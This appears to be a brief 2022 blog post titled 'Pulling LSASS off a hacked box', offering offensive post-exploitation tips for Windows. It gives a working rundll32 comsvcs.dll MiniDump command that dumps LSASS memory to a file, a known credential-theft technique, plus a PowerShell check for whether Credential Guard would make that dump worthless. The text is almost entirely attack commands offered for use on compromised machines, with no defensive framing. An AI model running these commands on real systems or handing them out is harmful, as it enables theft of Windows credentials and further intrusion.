Thursday, June 23, 2022

Pulling LSASS off a hacked box

If you can pull the lsass dump off the box, just use this "C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full" where 624 is the process ID for lsass.

I know you're trying to avoid PS, but this will tell you if Credential Guard is running (which makes the dump worthless)

powershell "(gcim Win32_DeviceGuard -n root\Microsoft\Windows\DeviceGuard).SecurityServicesRunning"